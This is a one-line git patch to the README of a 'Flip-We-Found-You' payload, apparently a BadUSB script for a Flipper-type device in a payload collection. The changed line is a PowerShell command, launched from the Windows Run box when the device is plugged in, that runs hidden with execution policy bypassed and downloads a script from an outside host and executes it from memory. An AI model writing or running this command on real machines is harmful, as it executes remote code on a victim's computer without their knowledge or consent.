From c7ce3eab48fe1b8f2e9e012d51d6eb4969fd4359 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 1 Jan 2023 17:22:35 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-We-Found-You/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-We-Found-You/README.md b/Payloads/Flip-We-Found-You/README.md index 9930502..010b557 100644 --- a/Payloads/Flip-We-Found-You/README.md +++ b/Payloads/Flip-We-Found-You/README.md @@ -40,7 +40,7 @@ SAPI speak with talk through their speakers the message provided or a custom one * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/yzb | iex +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex ```

(back to top)